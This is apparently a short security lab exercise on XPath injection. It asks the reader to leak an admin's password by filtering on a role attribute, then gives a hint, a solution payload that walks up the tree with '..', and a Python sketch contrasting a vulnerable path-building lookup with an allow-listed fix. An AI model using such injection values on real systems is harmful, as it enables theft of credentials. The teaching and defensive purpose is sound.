Xpath

Attributes


XPath is not only text

With XPath you can also query attributes. In this XML database the role of a user is stored as an attribute on the user node.

Try to find the user with role="ADMIN" and get its password.

Goal: find the admin and leak its password

Hints

Hint #1

@ can be used to filter by attribute.

For example, if you want the user whose id attribute equals 42, you would use /user[@id=42]

Solution


$user = guest
$node = ../../user[@role="ADMIN" and username != "admin"]/password

Explanation

We go up two nodes and select all the user nodes whose role attribute equals ADMIN, then we ask for the password.
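
The page does not show the server-side query, so the following is an added sketch and not the challenge's own code: it assumes a lookup of the form ./user[username='$user']/account/$node over a constructed XML document, and shows why pasting $node into the path lets an attribute predicate reach another user's password, next to a version that allow-lists the field name. The function names, the sample XML and the allow-list are hypothetical.

```python
import xml.etree.ElementTree as ET

# Constructed sample data: the page does not show its XML, so this layout is assumed.
SAMPLE_XML = """<data>
  <user role="ADMIN">
    <username>root</username><password>constructed-admin-secret</password>
    <account><email>root@example.test</email></account>
  </user>
  <user role="USER">
    <username>guest</username><password>constructed-guest-secret</password>
    <account><email>guest@example.test</email></account>
  </user>
</data>"""

# Fields a caller may read; hypothetical allow-list for this sketch.
ALLOWED_FIELDS = {"email"}

# The page's attribute filter, without the extra username test because
# ElementTree's XPath subset has no "and" operator.
ATTRIBUTE_PAYLOAD = '../../user[@role="ADMIN"]/password'


def load_sample():
    return ET.fromstring(SAMPLE_XML)


def lookup_vulnerable(root, user, node):
    # Both inputs are pasted into the path, so $node can walk back up the
    # tree with ".." and apply its own [@role=...] predicate.
    path = f"./user[username='{user}']/account/{node}"
    return [e.text for e in root.findall(path)]


def lookup_hardened(root, user, node):
    # $node must be one of the known field names: no "..", "/", "[" or "@".
    if node not in ALLOWED_FIELDS:
        raise ValueError(f"field not allowed: {node!r}")
    # $user is compared as data and never becomes part of a path string.
    for candidate in root.findall("./user"):
        if candidate.findtext("username") == user:
            return [e.text for e in candidate.findall(f"./account/{node}")]
    return []
```
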
